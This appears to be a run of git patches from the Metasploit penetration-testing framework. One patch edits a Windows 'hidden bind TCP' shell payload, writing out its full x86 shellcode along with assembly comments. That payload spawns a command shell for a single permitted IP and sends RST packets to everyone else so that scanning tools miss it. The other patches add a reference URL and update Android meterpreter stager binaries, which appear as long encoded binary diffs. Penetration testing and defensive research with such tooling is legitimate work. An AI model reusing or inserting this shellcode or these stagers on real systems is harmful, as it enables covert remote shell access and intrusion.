if error jump to condition function to wait for another connection - jz condition + inc eax + jz condition ; if error (eax = -1) jump to condition function to wait for another connection + dec eax push edi ; push the listening socket to close xchg edi, eax ; replace the listening socket with the new connected socket for further comms diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index e63628d4bc..c28daa8bd4 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -18,9 +18,9 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Windows Command Shell, Hidden Bind TCP Inline', 'Description' => 'Listen for a connection from certain IP and spawn a command shell. - The shellcode will reply with a RST packet if the connection is not - comming from the IP defined in AHOST. This way the socket will appear - as "closed" helping us to keep our shellcode hidden from scanning tools.', + The shellcode will reply with a RST packet if the connections is not + comming from the IP defined in AHOST. This way the port will appear + as "closed" helping us to hide the shellcode.', 'Author' => [ 'vlad902', # original payload module (single_shell_bind_tcp) @@ -28,7 +28,6 @@ module Metasploit3 'Borja Merino ' # Add Hidden ACL functionality ], 'License' => MSF_LICENSE, - 'References' => ['URL', 'http://www.youtube.com/watch?v=xYBuaVNQjGA&hd=1'], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::BindHiddenTcp, @@ -39,7 +38,7 @@ module Metasploit3 { 'LPORT' => [ 200, 'n' ], 'AHOST' => [ 262, 'ADDR' ], - 'EXITFUNC' => [ 364, 'V' ], + 'EXITFUNC' => [ 363, 'V' ], }, 'Payload' => "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" + @@ -59,14 +58,14 @@ module Metasploit3 "\xff\xff\x00\x00\x57\x68\xf1\xa2\x77\x29\xff\xd5\x53\x57\x68\xb7" + "\xe9\x38\xff\xff\xd5\x53\xe8\x17\x00\x00\x00\x8b\x44\x24\x04\x8b" + "\x40\x04\x8b\x40\x04\x2d\xc0\xa8\x01\x21\x74\x03\x31\xc0\x40\xc2" + - "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x83\xf8\xff\x74" + - "\xd4\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" + - "\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24" + - "\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" + - "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e" + - "\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a" + - "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05" + - "\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + "\x20\x00\x53\x53\x57\x68\x94\xac\xbe\x33\xff\xd5\x40\x74\xd6\x48" + + "\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3" + + "\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" + + "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56" + + "\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" + + "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68" + + "\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" + + "\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" } )) end From 3c95c021d003a741896a7e0d1ae04dffbde609e7 Mon Sep 17 00:00:00 2001 From: root Date: Mon, 10 Mar 2014 12:17:20 +0100 Subject: [PATCH 046/853] Reference added --- modules/payloads/singles/windows/shell_hidden_bind_tcp.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb index c28daa8bd4..57f57f712a 100644 --- a/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb +++ b/modules/payloads/singles/windows/shell_hidden_bind_tcp.rb @@ -28,6 +28,7 @@ module Metasploit3 'Borja Merino ' # Add Hidden ACL functionality ], 'License' => MSF_LICENSE, + 'References' => ['URL', 'http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html'], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::BindHiddenTcp, From 667bed890569cc5200eac376be38ed34fde79597 Mon Sep 17 00:00:00 2001 From: joe Date: Mon, 10 Mar 2014 18:50:27 -0700 Subject: [PATCH 047/853] New multi-arch stagers. --- data/android/apk/AndroidManifest.xml | Bin 3536 -> 3540 bytes data/android/apk/classes.dex | Bin 10700 -> 10040 bytes data/android/apk/resources.arsc | Bin 1088 -> 580 bytes .../libs/armeabi-v7a/libdalvikstager.so | Bin 0 -> 13436 bytes data/android/libs/armeabi/libdalvikstager.so | Bin 0 -> 13432 bytes data/android/libs/mips/libdalvikstager.so | Bin 0 -> 5328 bytes data/android/libs/x86/libdalvikstager.so | Bin 0 -> 5220 bytes data/android/meterpreter.jar | Bin 37700 -> 38353 bytes data/android/metstage.jar | Bin 1851 -> 1851 bytes data/android/shell.jar | Bin 1853 -> 1853 bytes 10 files changed, 0 insertions(+), 0 deletions(-) create mode 100644 data/android/libs/armeabi-v7a/libdalvikstager.so create mode 100644 data/android/libs/armeabi/libdalvikstager.so create mode 100644 data/android/libs/mips/libdalvikstager.so create mode 100644 data/android/libs/x86/libdalvikstager.so diff --git a/data/android/apk/AndroidManifest.xml b/data/android/apk/AndroidManifest.xml index 6ee7f3e36fed7e9e467fff4db6fd95f5a44848f9..57e86cd85b8f352caeb6fec49f73ddec852c075a 100644 GIT binary patch delta 285 zcmZ9{KS~2Z6vy%J+uhk+$gGIkB(W0$!9uXGu+9Zi2!a+G2&9Nj2o@o*2Z&9WTci+i z19ldkKp{u4unbngMt?RI4t$t-kN1apZLXR{OwOtRW1ok4aaaz4iQLJ%e8`t<8JtQ- z&SfG?Nh7$Fd)dfw3?o^}r<^1(l^5B_j)RtTq$eX;$g|YAoj+aF9Ye0^(bo-*F$2AC z=vQrH^}8X@{DHRoRh$u9 Mrubi1Rr;>|0DUhsL;wH) delta 320 zcmaLSFHb^I7{~G7bN|S7p1ZNhrrWu01{*;F!77lc^U-&dsqD3m1GL466wSOW^|)*$u3$ RO|u`JyM6!9_2SiC*cx>WG`0W$ diff --git a/data/android/apk/classes.dex b/data/android/apk/classes.dex index 3a45c8b3fbe7179ddfdaa76d4df59f50dc4e90ac..ff39e87f11448e4c3543e9611c6a19b1d18aa857 100644 GIT binary patch literal 10040 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 literal 10700 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 kRp_kbYk`cviKRA literal 1088 zcmds$u}%U}5JfL58VX{FS{Oq?X`yIgVTqlM-(WxtA=yQ;tcaCAVCe@~`k9`)FtUM) z)*+KSGw;1S@9iBDHPx$2HQC$x0r&8*^9aCOe1M-R*Ry82(vYaHH+-O!+NCmTQ;k_0 z>q#$~s7pT4h;zq(=Tc6*v-+xnof+A<+_@l5+1b>?s&)rU!Rj0@I8$2Eu6=UJ4-)st z=#kOA;LMC}DK+ozlDRfw?Y~+Z;r4ml7l@3dh6~WOuna>*002Pr)xIZfxl( z9q={RS~>SO%}c$kX+ksvJv;8}JA_?C0J`rf?pmEQ%h_-o>brj*^`?4c7W$>4(jk-O zDJjZXdMqbsj-EO9u&PPYQVaC_+MJ&l@u=038{JoGp5qR_w(oUVi5jaIEdLV0?PQZX uYTMiu!b)gvbC}y0+)E9Y8{^(l+lAZjH@7jkJrkSvj@mBVek zHFT{^eo!zrOZcU<7I}5~C|J~hy4!V2jdr(Pt^IuHwtiZb)tUErHch*dTGpacXTRS! z?+ud_wC>;B4=3lId(S=R+;h)8_r5oe?H{kJkt9ht#VtyOLoGz(!V0U$vrwoa2Yu5- zk(k8xEJ&bEkZo|rgS5)F*+LLJq!eMvf2>T1$L>r+69y0{m;ElFqv$`1e!>ON1ol(M zDl^sy^qyjkM=L}{8)pjPz^iB@IQFf^_-y@+7(j63PZW%D{26G6R*b z1L|!48R&l+bafW}Gte?8g~IV;z~^tUNQ<5fhZJS?&jURxi>?KIJd19~av=TjY0wGC zE3)N(c0zv-=vTp5ZTIg5U0ryI{%RJ#3Z8$SKtBgM@gX7hyVLfcnb7|`(4WG5>+F6P z)-5;7-eS-fv*zmueM46ND$q??bTjDTEV>)?(c(+%F$j7H^bvbL$3fqHJ!IPSv!J7( zTWtClpwEC-ZTb(OFM?+Lay@*on}ePH8K70r!*>72Kxg}R1?ZPy-z>X-(**iK&=<1$ z|8W9+2=oo`r!)RvC(ti}4rKL@PM}ku8?*WgF_CO~Ht5(4$gu6J1pQsmb8UJh=mco) z8_vHS^z@mR{QD4SHH$t3TBa}*MZA?dGJzhNK#NeQp(`BP)Z7+sX?`GLli^sTt2ri? ze_~l^Wm{c)xKV75#G=iOqO&d9(cBi>B-*2qHqjA5PeV(4C&zWh!VUL@8k+74Z3;KH zjBD7uHQdpNmT)Azu{pH0?K917jiH8UG!*Ud+e+57wNOncw7G3-Xib`ysGX}=Qp z6?|k3yNrV}?MpJ|VCqY17LAv`I^5hD`FK}DBpPdOZyVoN)85e#X-v;$d=D08Yb$4; zHLrAAsJ$b!IudK@X#Y$`?~?Y`XiJ3Nvi(vWA$bL@ixK0oj&K9Tzjr}HAxFqW%Wc^c zn=kR(HamRI6f*LxhRfN1nVDszj`xu*dwgStH*01#V^)jh%B|^Lxv3*e@7hdQw$%vD z_O|+1I4hXZTo-P`zTX_FN8B}UYHp|w$HLjeNUx5xEDke!T#|Noqze-5=18M8D73M& zllg@TB5jSLrFmm#tg+#iTgp1yNwnIy!N!d(P9@xOfAf79xjE9oCLwSY6L$f4{_t)x z4X^<45x_No+W;)QB>ie zN&t5PZU*2Ow(d`N03$8Gr{L(wl&t$*rj3;;<0yd>;>yLB)y4Y<3-2V^WwK51KE?6@ zz>QW-i0f>O>xjUSB<28k_2WJ4CIEe_0$6x;_5Pmzq!CJz^#DkfKmVpj(6)m zOn)53;t(IV@sN$bYvU(vtN~BMgpLryh^L5gj{g++15k3BSi;#)4ClT|j7#_#VmLEF z3}>As#$-o`G5I%%A#aQr!Ev4#23;V=LSH22eIzl@loN-|YZAK?-m$067=!59-MafH z59_hFpE8|#OIE!xtNy91`rTRex~zJ2R=p~#zA&pkH>*A?tA0aPy$E%$de{_-X1LVd ziI-EUQ5p8i0&QY<;w8}M5$N+?A6xm&|6TE5+lriHEz2LQp4W6s)ARe>OVK$y@xre7ix>K$-8KH2 